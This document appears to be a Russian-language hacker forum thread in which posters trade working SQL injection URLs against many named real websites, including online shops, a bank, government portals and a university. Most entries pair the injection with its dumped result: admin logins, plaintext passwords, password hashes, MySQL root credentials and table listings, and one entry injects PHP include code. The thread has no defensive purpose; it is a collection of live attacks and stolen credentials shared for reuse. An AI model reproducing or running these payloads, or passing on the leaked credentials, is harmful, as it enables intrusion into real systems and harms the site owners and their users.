SQL Инъекции

Антибоян нахлабучило, холм прикрыл мой сайт, потому что я юзал фтпщник под свои личные нужды.. так что предеться немного подождать.
+ к этому у neval а неплохая получилась конструкция, возможно у него антибоян будет базироваться
з.ы кстати неплохо было с 220 по эту страничку собрать иньекты так что стучите в асю кто поможет

 

Code:

http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6/*

cspr_cspr:cspr_cspr@localhost:4.1.21-standard-log

Форум:

Code:

http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(username,char(58),user_password),4,5,6+from+phpbb_users+limit+1,1/*

admin:34d7b21152ce773f71ddcc88c99d4231:::shutnick

Сайт:

Code:

http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(login,char(58),password),4,5,6+from+users/*

admin:forgetit

 

Всё раскрыто, всё перед вами))
id : username : pass(md5) : email : icq

 

Антибоян:

http://antiboyansql.narod.ru

http://antiboyansql.narod.ru/sql.txt

http://hack-shop.org.ru/sql.php

----------------------------------------------------------------

Constantine я тебе личку отправил, логин и пароль к сайту.

 

http://kozaky.org.ua/index.htm?tema=-1+union+select+convert(version()+using+cp1251)/*

 

Code:

http://kava.lviv.ua/event/index.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,id)+from+admin/*

 

http://www.secureworldexpo.com/ - PR 5

Вот те блин и secureworldexpo ! Да...

Code:

http://www.secureworldexpo.com/events/index.php?id=-228+union+select+1,concat(username,1,password),3,4+from+login/*

User: secureworld
Password: secure503
Аднинка: http://www.secureworldexpo.com/admin

 

Code:

http://www.sodalitas.it/news.php?ID=-174+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+user/*

sodal2002:admin.sodal2002

Code:

http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*

 

http://www.control.ge/index.php?lang_id=ENG&sec_id=100+union+select+1,2,3,4,5,6,7/*

 

http://www.ninsis.ru/content.php?id=50'+union+select+55,2,3,4,user(),6,7,database()/*

Мля.. моя первая SQL-инъекция... =)

 

вот тебе ещё по втоему сайту)

Code:

http://www.ninsis.ru/content.php?id=50'+union+select,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/*

и ещё)))

Code:

http://www.ninsis.ru/content.php?id=50'+union+select+50,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,%205,6+from+php_users+limit+1,600/*

 

Эстония

PHP:

http://matkarajad.maaturism.ee/index.php?id=85+union+select+1,2,3,4,5,6--&pg=object
http://www.union.ee/index.php?id='+union+select+1,2,3,4,5,6,7,8,9,10/*
http://surf.triip.ee/index.php?ID=10+union+select+1,2,3,4,5,6,7,8,9--

stmarys-ca.edu

PHP:

http://stmarys-ca.edu/news_events/news/viewstory.php?id=-24+union+select+1,2,3,4,user,6,7,password,9,10,11,12,13,14+from+mysql.user/*

login:root
pass:456791a12266fca0

 

http://www.solntseva.com/biblio_detail.php?id=-16+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3+from+phpbb_users+limit+1,1/*

 

Code:

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=39+and+ascii(lower(substring(version(),1,1)))=0x35

MySQL 5.x

Code:

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-1+union+select+1/*

Улыбнуло =)

Пользователь:

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=39+and+user()=char(0x75,0x6e,0x69,0x78,0x64,0x6f,0x63,0x40,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74)

unixdoc@localhost

 

Code:

http://www.citroen-forum.nl/markt/advertentie.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x203a20,username,user_password,user_email),12,13,14,15,16,17+from+citroen_users+limit+0,50/*

6.8k акков

 

mssql:

Code:

http://shop.nag.ru/core.asp?main=catalog&act=page&id=1034+or+1=@@version--

table:

Code:

__STITLES
Accounts
Action_Transition
ActionOnTransitions
Admins
Advert
afftypes
agent
AllowedStatus
AllowedTransitions
AlternativeProducts
Banlog
Banner
BannerLocations
banners
BizRateCategories
BizRateRules
BizRateTemplates
BLP
BP
BundleItems
BundleItemsView
BundleProductIDs
Bundles
campaign
Cards
Categories
CategoryMap
clicks
ClicksReportTemp
Contacts
Countries
Departments
Discounts
dtproperties
Feedback
FeedUploads
GroupDiscounts
Groups
ImageTypes
Import
impress
Invoice
ItemState
Links
MailBlackList
MailBroadcastResults
MailBroadcasts
MailDictionary
MailExtractors
MailListEmails
MailLists
MailTemplates
ManualChanges
ManuallyChangedValues
MemberDiscounts
MemberGroups
Members
MemberTransactions
MenuItems
Messages
ModelDocument
OrderDiscounts
OrderLines
OrderLog
Orders
OrderStatus
OrderStatuses
OrderTypes
OrdStatusHistory
Page
PageLog
PagePerms
Pages
params
PaymentActions
payments
PermisionMenu
PlatformCategories
Platforms
Priority
ProductCategories
ProductImages
ProductItems
ProductPlatforms
Products
ProductsTitles
Publishers
QualityDeductions
QualitySettings
QuantityDeductions
QuantitySettings
Ratings
Reasons
RelatedProducts
ReportsTemp
SearchQuery
Sections
Settings
Shipping
ShippingClasses
ShippingMethods
ShippingRates
Shopcart
ShopcartDiscounts
ShopcartRequirements
SiteCMS
SiteTemplates
States
StatusHistory
Substitutions
SupplyRequest
sysconstraints
syssegments
Tasks
TitlesCategoriesPlatforms
TradeInRequirements
Vendors
WaitList
WordIndex
XLSImport

mysql(агрохимбанк):

Code:

http://www.axbank.ru/library/comments.html?id=-1)+sql

table:

Code:

_a_event
_a_finance
_a_history
_a_license
_a_management
_a_mission
_a_response
_a_struct
_about
_action_g
_c_cards
_c_cassa
_c_consult
_c_converse
_c_credit
_c_deposit
_c_econom
_c_fact
_c_inkass
_c_paper
_c_safe
_c_super
_c_system
_c_uprav
_corporate
_cr_m_credit
_cr_s_credit
_cr_scheta
_cred
_exchanges
_f_cards
_f_change
_f_credit
_f_inet
_f_paper
_f_paper_b
_f_paper_d
_f_perevod
_f_perevod_c
_f_perevod_e
_f_perevod_w
_f_privat
_f_safe
_f_text
_f_vklad
_fiz
_k_forvard
_k_org
_k_quality
_k_text
_klientz
_l_acts
_l_books
_l_comments
_l_img
_l_publics
_l_types
_l_video
_library
_m_action
_m_action_text
_m_dirs
_m_prav
_m_revision
_open_support
_p_announce
_p_faq
_p_news
_p_quest
_p_release
_p_report
_p_themes
_paper_b
_paper_d
_press
_rec
_s_filials
_s_otdel
_s_sales
_s_vacancy
_s_vacancy_text
_t_tarif
_t_types
_tablesTree
_tarifs
_v_sroks
_v_types
_vacancy
bdict
categories
crossdict
dict
dict00
dict01
dict02
dict03
dict04
dict05
dict06
dict07
dict08
dict09
dict0A
dict0B
dict0C
dict0D
dict0E
dict0F
dict10
dict11
dict12
dict13
dict14
dict15
dict16
dict17
dict18
dict19
dict1A
dict1B
dict1C
dict1D
dict1E
dict1F
dict20
dict21
dict22
dict23
dict24
dict25
dict26
dict27
dict28
dict29
dict2A
dict2B
dict2C
dict2D
dict2E
dict2F
dict30
dict31
dict32
dict33
dict34
dict35
dict36
dict37
pict38
dict39
dict3A
dict3B
dict3C
dict3D
dict3E
dict3F
dict40
dict41
dict42
dict43
dict44
dict45
dict46
dict47
dict48
dict49
dict4A
dict4B
dict4C
dict4D
dict4E
dict4F
dict50
dict51
dict52
dict53
dict54
dict55
dict56
dict57
dict58
dict59
dict5A
dict5B
dict5C
dict5D
dict5E
dict5F
dict60
dict61
dict62
dict63
dict64
dict65
dict66
dict67
dict68
dict69
dict6A
dict6B
dict6C
dict6D
dict6E
dict6F
dict70
dict71
dict72
dict73
dict74
dict75
dict76
dict77
dict78
dict79
dict7A
dict7B
dict7C
dict7D
dict7E
dict7F
dict80
dict81
dict82
dict83
dict84
dict85
dict86
dict87
dict88
dict89
dict8A
dict8B
dict8C
dict8D
dict8E
dict8F
dict90
dict91
dict92
dict93
dict94
dict95
dict96
dict97
dict98
dict99
dict9A
dict9B
dict9C
dict9D
dict9E
dict9F
dictA0
dictA1
dictA2
dictA3
dictA4
dictA5
dictA6
dictA7
dictA8
dictA9
dictAA
dictAB
dictAC
dictAD
dictAE
dictAF
dictB0
dictB1
dictB2
dictB3
dictB4
dictB5
dictB6
dictB7
dictB8
dictB9
dictBA
dictBB
dictBC
dictBD
dictBE
dictBF
dictC0
dictC1
dictC2
dictC3
dictC4
dictC5
dictC6
dictC7
dictC8
dictC9
dictCA
dictCB
dictCC
dictCD
dictCE
dictCF
dictD0
dictD1
dictD2
dictD3
dictD4
dictD5
dictD6
dictD7
dictD8
dictD9
dictDA
dictDB
dictDC
dictDD
dictDE
dictDF
dictE0
dictE1
dictE2
dictE3
dictE4
dictE5
dictE6
dictE7
dictE8
dictE9
dictEA
dictEB
dictEC
dictED
dictEE
dictEF
dictF0
dictF1
dictF2
dictF3
dictF4
dictF5
dictF6
dictF7
dictF8
dictF9
dictFA
dictFB
dictFC
dictFD
dictFE
dictFF
links
qcache
qinfo
qtrack
server
srvinfo
url
urlinfo
wrdstat

ещё один шоп:

Code:

http://shop.rosastro.ru/starlist.php?sozv=2&select=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user/*

root:
admin:42cf
говру:

Code:

http://ntc.duma.gov.ru/bpa/docview.phtml?bpaid=1&t=T&code=-1+union+select+concat(user,0x3a,password)+from+mysql.user/*

Code:

http://pravo.tambov.gov.ru/soft_na/bpa/docview.phtml?bpaid=2&code=-1+union+select+concat(user,0x3a,password)+from+mysql.user/*

без коментариев)

Code:

http://shop.nastolki.ru/item.php?id=234','lala','=)))','<?php include($page)?>','tyc','tyc','tyc')/*

желтая пресса:

Code:

http://old.zhizn.ru/comment.php?link=stars&id=-1+union+select+concat(0x3d,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&page=2&per_page=3

би-два:

Code:

http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_name+not+in+('phpbb_config','phpbb_topics','COLLATIONS','COLLATION','CHARACTER_SET','APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS','TABLES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES','COLLATION_CHARACTER_SET_APPLICABILITY','TRIGGERS','PROFILING','USER_PRIVILEGES','VIEWS','CHARACTER_SETS','arhiv_tbl','biologia_tbl','banner_tbl','credits_tbl','country_tbl','creviews_tbl','chtivo_tbl','disk_tbl','faces_tbl','diary_tbl','fanclub_tbl','faq_answers_tbl','fanclub_activity_tbl','faq_questions_tbl','filmographia_tbl','forum_topic_tbl','forum_authors_tbl','grafik_tbl','golos_tbl','friends_tbl','guest_authors_tbl','guest_comments_tbl','guest_online_tbl','handmade_index_tbl','guest_topic_tbl','handmade_tbl','history_tbl','hotnews_tbl','hudozestva_index_tbl','hudozestva_tbl','indexnews_tbl','humor_tbl','links_tbl','konkurs_tbl','nevorob_tbl','oboi_index_tbl','oboi_tbl','photoalbum_index_tbl','photoalbum_tbl','premeri_tbl','probap_tbl','radio_log','radio_users','raznoe_tbl','reviews_tbl','shop_tbl','sideaccords_tbl','sides_tbl','sidedisk_tbl','sidesong_text_tbl','sidetracks_tbl','song_text_tbl','tour_tbl','tracks_tbl','version_tbl','unoff_tbl','vfocuse_index_tbl','vfocuse_tbl','videohronika_tbl','accords_tbl','phpbb_auth_access','phpbb_banlist','phpbb_confirm','phpbb_disallow','phpbb_forum_prune','phpbb_forums','phpbb_posts','phpbb_groups','phpbb_posts_text','phpbb_privmsgs','phpbb_privmsgs_text','phpbb_ranks','phpbb_search_results','phpbb_search_wordlist','phpbb_search_wordmatch','phpbb_sessions','phpbb_sessions_keys','phpbb_smilies','phpbb_themes','phpbb_themes_name','phpbb_topics_watch','phpbb_user_group','phpbb_users','phpbb_vote_desc','phpbb_vote_results','phpbb_vote_voters','phpbb_words','phpbb_categories')/*

мобила:

Code:

http://www.mobila.com.ua/news.php?razdel=999+union+select+1,2,3/*

хостинг1:

Code:

http://web.privat-online.net/news.php?id=-1'+union+select+1,table_name,3,4,5+from+information_schema.tables+where+table_name+not+in+('COLLATIONS','COLLATION','CHARACTER_SET','APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS','TABLES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES','COLLATION_CHARACTER_SET_APPLICABILITY','TRIGGERS','PROFILING','USER_PRIVILEGES','VIEWS','CHARACTER_SETS','articles','newsrus','dbusers','newsukr','webnews')/*

хостинг2:

Code:

http://www.realsweb.com/news.php?item=-1+union+select+1,2,3,table_name,5,6+from+information_schema.tables+where+table_name+not+in+(0x434f4c4c4154494f4e53,0x434f4c4c4154494f4e5f4348415241435445525f5345545f4150504c49434142494c495459,0x434f4c554d4e53,0x434f4c554d4e5f50524956494c45474553,0x4b45595f434f4c554d4e5f5553414745,0x50524f46494c494e47,0x524f5554494e4553,0x534348454d415441,0x534348454d415f50524956494c45474553,0x53544154495354494353,0x5441424c4553,0x5441424c455f434f4e53545241494e5453,0x5441424c455f50524956494c45474553,0x5452494747455253,0x555345525f50524956494c45474553,0x5649455753,0x4348415241435445525f53455453)/*

 

http://www.ghdhair.com/go/shop-uk/product_info.php?products_id=-1+union+select+VERSION()/*

http://www.turkuaz.us/content.php?magId=-34+union+select+1,2,3,4,VERSION(),6,7/*

http://right-web.net/right-host/rus/news.shtml?id=-45+union+select+1,2,3,4,5,6,7+from+users/*

 

http://berloga.net/?c=-1+union+select+1,2,3,4,5,VERSION(),7,8,9,10,11,12,13/*

 

Code:

http://www.fsi.cbi.uni-erlangen.de/userinfo.php?id=-14+union+select+1,2,convert(concat_ws(0x3a,name,password,email)+using+latin1)+from+fscbi_user/*

Решил найти админку обратился http://www.fsi.cbi.uni-erlangen.de/admin.php
Мне любезно сообщили что такой нет и предложили верный путь
http://www.fachschaft.cbi.uni-erlangen.de/admin/login.php
Ну что за чудаки =)) Попробывал залогинится дедовским методом 1' or 1=1/*
Получил отказище, но зато узнал где лог

Code:

http://www.fsi.cbi.uni-erlangen.de/userinfo.php?id=-14+union+select+1,2,convert(concat_ws(0x3a,action,time,userid,type)+using+latin1)+from+fscbi_log/*

Вообщем ничего особенного, но забавно

 

http://www.zonewm.biz/showasf.php?id=-4+union+select+1,2,3,id,5,pass,7,8,9+from+user/*